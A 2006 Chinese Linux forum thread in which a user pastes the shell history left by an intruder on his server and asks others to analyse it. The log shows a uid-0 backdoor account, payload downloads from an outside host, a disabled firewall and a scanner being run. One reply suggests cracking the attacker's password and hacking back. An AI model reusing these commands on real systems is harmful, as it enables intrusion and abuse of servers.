免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
论坛 操作系统 Linux系统管理 我得服务器被黑了,看看老外都干了什么!!
12345678下一页
最近访问板块 发新帖
查看: 38395 | 回复: 77
打印 上一主题 下一主题

我得服务器被黑了,看看老外都干了什么!! [复制链接]

firer2000

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2006-05-26 17:13 |只看该作者 |正序浏览
我得服务器被老外黑了!!因为密码太简单,自己玩的服务器,被黑无所谓,但是大家分析分析他都干了什么,下面是他打的命令:

427  w
  428  ifconfig
  429  adduser rc -u 0 -o -g 0
  430  passwd rc
  431  php -v
  432  netstat -nat
  433  cd /var/www/html/
  434  ls -la
  435  wget http://md-host.net/db/SignIn.tar.gz
  436  tar zxf SignIn.tar.gz
  437  netstat -nat
  438  w
  439  cd /var/tmp/
  440  wget ftp://rpmfind.net/linux/fedora/c ... xim-4.43-1.i386.rpm
  441  rpm -ivh exim-4.43-1.i386.rpm
  442  rpm -qa |grep exim
  443  rpm -e exim-mon-4.43-1.RHEL4.3
  444  rpm -e exim-sa-4.43-1.RHEL4.3
  445  rpm -e exim-doc-4.43-1.RHEL4.3
  446  rpm -e exim-4.43-1.RHEL4.3
  447  rpm -ivh exim-4.43-1.i386.rpm
  448  netstat -nat
  449  hostname
  450  /etc/init.d/exim start
  451  netstat -natp
  452  ifconfig
  453  php -v
  454  mkdir .~
  455  cd .~
  456  wget http://md-host.net/db/s.tar.gz
  457  tar zxf s.tar.gz
  458  ls- la
  459  ls -la
  460  rm -rf s.tar.gz
  461  mcedit system.php
  462  export LANG=c
  463  mcedit bla.txt
  464  mcedit list.txt
  465  cat >i
  466  hostname -F i
  467  /etc/init.d/exim start
  468  /etc/init.d/exim restart
  469  adduser kyle
  470  su kyle
  471  /etc/init.d/iptables stop
  472  netstat -natp
  473  kill -9 6683
  474  kill -9 2120
  475  kill -9 1811
  476  kill -9 2100
  477  kill -9 2334
  478  kill -9 2334
  479  kill -9 1382
  480  kill -9 2389
  481  kill -9 23010
  482  netstat -natp
  483  /etc/init.d/mysqld stop
  484  /etc/init.d/exim restart
  485  su kyle
  486  rpm -e sendmail-doc-8.13.1-2
  487  rpm -e sendmail-devel-8.13.1-2
  488  rpm -e sendmail-cf-8.13.1-2
  489  ifconfig
  490  php -f system.php
  491  netstat -natp
  492  w
  493  netstat -nat
  494  netstat -natp
  495  cd /var/tmp/
  496  ls -la
  497  cd .~
  498  ls -la
  499  rm -rf i
  500  hostname
  501  w
  502  passwd
  503  cd /var/named/
  504  ls -la
  505  cd chroot/var/named/
  506  ls -la
  507  mail
  508  mail csergiu@gmail.com
  509  /etc/init.d/spamassassin stop
  510  rpm -qa |grep spamassassin
  511  rpm -e spamassassin-3.0.1-0.EL4
  512  rpm -e spamassassin-3.0.1-0.EL4 --nodeps
  513  rpm -e evolutio
  514  rpm -qa |grep evolution-2.0.2-16.i386
  515  rpm -qa |grep evolution
  516  rpm -e evolution-devel-2.0.2-16
  517  rpm -e evolution-data-server-1.0.2-7
  518  rpm -e evolution-data-server-1.0.2-7 --nodeps
  519  rpm -e evolution-2.0.2-16
  520  rpm -e evolution-2.0.2-16 --nodeps
  521  rpm -e evolution-connector-2.0.2-5
  522  rpm -e evolution-webcal-1.0.10-1
  523  rpm -e evolution-data-server-devel-1.0.2-7
  524  /etc/init.d/exim restart
  525  mail csergiu@gmail.com
  526  ifconfig
  527  ifconfig
  528  cd /var/tmp/
  529  cd .~
  530  rm -rf *
  531  wget http://md-host.net/db/kidu.tgz
  532  tar zxf kidu.tgz
  533  ls -la
  534  rm -rf kidu.tgz
  535  touch bios.txt uniq.txt vuln.txt viln.txt
  536  ./go.b 221.220
  537  cd /opt
  538  la
  539  ls

大家一起分析一下!
supertcy

论坛徽章:
0
78 [报告]
发表于 2006-09-06 00:33 |只看该作者
前几天弄了台新服务器,还没正式使用,所以密码就随手设置成了六个1,结果过了一周同样发现被用这种手段入侵了,看来这家伙效率蛮高的。。
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
Ecore

论坛徽章:
0
77 [报告]
发表于 2006-09-05 20:31 |只看该作者
强烈建议楼主使用john把他填加的用户密码跑出来。然后等他下次上来,就连他的机子试试。。

或者等他下次上来..用write和他聊天。
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
mjdcl

论坛徽章:
0
76 [报告]
发表于 2006-09-05 18:55 |只看该作者
不是很明白,su成加的用户(rc),
竟然提示符还是
[root@XX],那他加这个用户干嘛?
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
sbyond

论坛徽章:
0
75 [报告]
发表于 2006-09-05 16:54 |只看该作者

回复 75楼 lvDbing 的帖子

一边干坏事 一边 w ,看到有人上来就logout
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
lvDbing

论坛徽章:
0
74 [报告]
发表于 2006-06-12 17:41 |只看该作者
cool
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
todaynet

论坛徽章:
0
73 [报告]
发表于 2006-06-12 14:07 |只看该作者
看了之后学了东西,同时也给自己一个很大启示和警钟信号。
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
garfieldpb

论坛徽章:
0
72 [报告]
发表于 2006-06-09 21:09 |只看该作者
希望成为CU高手现身贴~~~
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
frank533

论坛徽章:
0
71 [报告]
发表于 2006-06-08 23:40 |只看该作者
怎么知道跟EBAY有关系的?
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
anakin81

论坛徽章:
0
70 [报告]
发表于 2006-06-08 11:47 |只看该作者
看到了这个,知道自己的技术不够。 和朋友谈了。。

♫♪--ăĤ-ķĬň--♪♫   说:
adduser rc -u 0 -o -g 0    <--- u understand this command?
[ = M a r s = ] 说:
hmmm
group 0, uid 0?
why
o>O
  ♫♪--ăĤ-ķĬň--♪♫   说:
a server rooted by people .. and that guy paste out the history ...
i see this but i dont understand haha
[ = M a r s = ] 说:
history from the rooter?
well, easy as this
he added a user with uid 0
normally, uid 0 == super user
lol
  ♫♪--ăĤ-ķĬň--♪♫   说:
oh...
mean add root  
haha
[ = M a r s = ] 说:
root:*:0:0::0:0:Charlie &:/root:/bin/csh
see the 0:0::0:0
yup
lol
toor:*:0:0::0:0:Bourne-again Superuser:/root:/bin/sh
see again :0:0::0:0:
0 uid - 0 gid == super user

  ♫♪--ăĤ-ķĬň--♪♫   说:
oh
disabled SUID ..
[ = M a r s = ] 说:
there's 4 ids
x:
first two is the primary
second two is the secondary
as in, u want to add the user into 2 groups, etc
so, first two must NOT be 0:0
if not, its root
lol
  ♫♪--ăĤ-ķĬň--♪♫   说:
ok... got it



我觉得人家特地流history给你看的。

[ 本帖最后由 anakin81 于 2006-6-8 11:51 编辑 ]
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
12345678下一页
返回列表 发新帖
  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP